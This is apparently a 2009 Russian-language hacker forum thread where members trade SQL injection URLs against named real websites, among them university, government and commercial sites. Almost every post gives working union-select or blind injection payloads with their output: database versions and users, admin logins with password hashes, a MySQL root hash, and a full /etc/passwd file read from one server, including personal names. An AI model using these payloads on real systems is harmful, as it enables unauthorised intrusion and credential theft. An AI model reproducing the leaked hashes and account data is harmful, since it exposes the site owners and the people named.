13.02.2009, 22:40
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(versio n(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18
4.1.21-standard
engel_website
engel_website@localhost
http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(id,0x3 a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+from+engel_users
|
|
|
13.02.2009, 23:13
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
PageRank = 7
https://sju.ca/people2.php?id=18098097409809670+union+select+1,2, 3,concat_ws(0x3a,version(),user(),database()),5,6, 7,8,9,10,11,12,13,14,15,16--
Database Version: 5.0.38-Ubuntu_0ubuntu1-log
Database name: sjudb
User name: sjuuser@64.235.105.134
PageRank = 5
http://www.contemporaryposters.com/category.php?Category_ID=3798798698750+union+selec t+concat_ws(0x3a,version(),user(),database())--
4.1.22-standard
dsmayer_dsmayer@localhost
dsmayer_contemporaryposters
https://www2.tpwd.state.tx.us/huntwild/hunt/planning/hunt_lease/details.php?id=68751587468760+union+select+1,2,3,4 ,5,6,7,8,concat_ws(0x3a,version(),user(),database( )),10,11,12,13--
4.1.20-log
huntLeaseDefault@localhost
huntlease
http://www.2007.botanyconference.org/engine/search/index.php?func=detail&aid=1809809709840+union+sele ct+1,concat_ws(0x3a,version(),user(),database()),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42--
5.0.67-community
scientif@localhost
botany2007 |
|
|
|
13.02.2009, 23:56
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами:
9227224
Репутация:
60
|
|
http://www.droug.ru/index.php?id=270+and+substring(version(),1,1)=5
version: 5
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),1,1))= 100 == d
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),2,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),3,1))= 111 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),4,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),5,1))= 103 == g
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),6,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),7,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),8,1))= 64 == @
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),9,1))= 49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),10,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),11,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),12,1)) =49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),13,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),14,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),15,1)) =49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),16,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),17,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),18,1)) =50 == 2
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),19,1)) =50 == 2
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),20,1)) =48 == 0
user: drougru@10.10.10.220
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),1,1))= 100 == d
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),2,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),3,1))= 111 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),4,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),5,1))= 103 == g
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),6,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),7,1))= 117 == u
database: drougru
|
|
|
|
14.02.2009, 01:00
|
|
Новичок
Регистрация: 19.01.2009
Сообщений: 15
С нами:
9109395
Репутация:
13
|
|
Код:
http://www.savatouristik.ru/index.php?id=-1%20UNION%20SELECT%201,%20concat_ws(char(58),%20user(),%20version(),%20database())%20--
client304@localhost:4.0.27:savatour |
|
|
|
14.02.2009, 02:28
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами:
9133681
Репутация:
90
|
|
datasvyazi.ru Качественный хостинг=)))
http://datasvyazi.ru/about/news/?rid=3619'+union+select+1,2,concat_ws(0x3a,user(), version(),database()),4,5,6+--+
юзер - s uperaza_data@localhost
бд - superaza_data
версия MySQL - 5.0.44-log
http://datasvyazi.ru/about/news/?rid=3619'+union+select+1,2,group_concat(login,0x3 a,pass),4,5,6+from+mb_users+--+
по все видимости логин админа: superaza , а md5 хеш пароля: a1314764bfdb8b9683dcf378520912a4
|
|
|
|
14.02.2009, 03:05
|
|
Новичок
Регистрация: 19.01.2009
Сообщений: 15
С нами:
9109395
Репутация:
13
|
|
Код:
http://www.i4b.ru/link2.php?id=1%20union%20select%20group_concat(concat_ws(char(58),%20id,pass,nick)%20SEPARATOR%200x3C62723E)%20from%20smerus_users%20limit%201
Последний раз редактировалось Parserian; 14.02.2009 в 03:12..
|
|
|
|
14.02.2009, 03:16
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
|
|
Код:
http://www.open-bg.net/news.php?id=-1+union+select+1,2,concat_ ws(0x3a,version (),database(),user()),4,5,6--
Database Version : 5.0.51a-log
Database name : openbg_mambo1
User name : ropenbg_mambo1@localhost
берем админов:
Код:
http://www.open-bg.net/news.php?id=-1+union+select+1,2,concat _ws(0x3a,flogin,f pass),4,5,6+ from+atuser--
выводятся все сразу ))
вот и сама админка :
Код:
http://www.open-bg.net/adm /index.php
-------------------------# add
Код:
http://ypetev.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version( ),database(),user()),4,5,6--
Database Version : 5.0.67-community-log
Database name : ypetevc_1
User name : ypetevc_1@localhost
Последний раз редактировалось f1ng3r; 14.02.2009 в 04:12..
|
|
|
|
14.02.2009, 11:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.consensus.ro/shop.php?lang=ro&action=termekek&kat=-24+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8/*
Database Version: 4.1.22
Database name: consensus
User name: root@localhost
Read File
http://www.consensus.ro/shop.php?lang=ro&action=termekek&kat=-24+UNION+SELECT+1,2,3,LOAD_FILE(0x2F6574632F706173 737764),5,6,7,8/*
|
|
|
|
14.02.2009, 11:25
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
haas.stanford.edu - PR6
Код:
http://haas.stanford.edu/external_fellowships/definition.php?cat_id=10000'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4/*
DB_Ver : 4.1.22
DB_User : haas@localhost
DB : haas
|
|
|
|
14.02.2009, 13:28
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
www.acd.edu
PR:4
Код:
http://www.acd.edu/news.php?id=-1'+union+select+1,2,concat_ws(0x3a,user,password),4,5+from+mysql.user/*
логин/пасс:
Код:
root:45b3d67e3384ad28
Код:
http://www.acd.edu/news.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+from+mysql.user/*
версия/юзер/бд:
Код:
4.1.22:root@localhost:InternalKnowledgeBase
смотрим file_priv:
Код:
http://www.acd.edu/news.php?id=-1'+union+select+1,2,file_priv,4,5+from+mysql.user/*
Y
Читает etc/passwd
Код:
http://www.acd.edu/news.php?id=-1'+union+select+1,2,load_file('/etc/passwd'),4,5+from+mysql.user/*
Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
XXnews:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
XXoperator:x:11:0:operator:/root:/sbin/nologin
XXgames:x:12:100:games:/usr/games:/sbin/nologin
XXgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
XXftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/bin/bash
XXwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mwade:x:500:500::/home/mwade:/bin/bash
rack:x:501:501::/home/rack:/bin/bash
dzo:x:502:502::/home/dzo:/bin/bash
psienkiewicz:x:503:503:Piotr Sienkiewicz:/home/psienkiewicz:/bin/bash
galileoe:x:504:504:Galileo Website:/home/galileoe:/bin/false
matt:x:505:505:Matt Wade:/home/matt:/sbin/nologin
lynn:x:506:506:lynn:/home/lynn:/bin/false
aaron:x:507:507:aaron:/home/galileoe/xdrive/folder/aaron/./:/bin/false
XXtemp:x:509:509:temp:/home/temp:/bin/sh
plastus:x:510:510::/home/plastus/:/bin/sh
xdrive:x:511:511::/home/galileoe/xdrive/:/bin/false
veeroos:x:512:512::/home/veeroos:/bin/sh
gallery:x:513:513::/home/gallery:/bin/sh
Xkamil:x:514:514::/home/kamil:/bin/sh
presentations:x:516:516::/home/galileoe/xdrive/presentations:/bin/sh
rpelletier:x:517:517::/home/rpelletier:/bin/bash
ccarson:x:518:518:Chuck Carson:/home/ccarson:/bin/bash
wwolfe:x:519:519::/home/wwolfe:/bin/bash
apache2:x:102:102:Apache2 Owner:/usr/local/httpd-2.2.6:/bin/false
mysqldev:x:5000:5000:Mysql Dev User:/usr/local/mysql:/sbin/nologin
oracle:x:110:110:Oracle User:/u01/app/oracle/home:/bin/bash
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
